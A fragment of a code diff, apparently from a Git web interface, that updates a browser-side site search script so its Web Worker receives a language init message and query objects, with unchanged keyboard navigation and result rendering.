self.onmessage = ({data:q}) => {
|
||||
const q = data.query || data;
|
||||
if(!q){ postMessage([]); return; }
|
||||
|
||||
const all = [];
|
||||
@ -114,12 +146,16 @@
|
||||
all.sort((a,b)=>b.norm-a.norm);
|
||||
postMessage(all.slice(0,MAX));
|
||||
};
|
||||
})();
|
||||
`;
|
||||
|
||||
/* ───────────── 2. spawn worker ───────────── */
|
||||
const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
|
||||
|
||||
/* ───────────── 2.1. initialize worker with language ───────────── */
|
||||
const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
|
||||
const lang = htmlLang.split('-')[0];
|
||||
worker.postMessage({type: 'init', lang: lang});
|
||||
|
||||
/* ───────────── 3. DOM refs ─────────────── */
|
||||
const wrap = document.getElementById('search-wrapper');
|
||||
const bar = document.getElementById('searchbar');
|
||||
@ -133,6 +169,7 @@
|
||||
icon.setAttribute('aria-label','Loading search …');
|
||||
icon.setAttribute('title','Search is loading, please wait...');
|
||||
|
||||
|
||||
const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
|
||||
let debounce, teaserCount=0;
|
||||
|
||||
@ -184,7 +221,7 @@
|
||||
else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
|
||||
});
|
||||
|
||||
bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); });
|
||||
bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); });
|
||||
|
||||
/* ───────────── worker messages ───────────── */
|
||||
worker.onmessage = ({data}) => {
|
||||
@ -207,5 +244,5 @@
|
||||
docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
|
||||
listOut.classList.toggle('hidden',!docs.length);
|
||||
};
|
||||
})();
|
||||
})();
|
||||
|
Loading…
x
Reference in New Issue
Block a user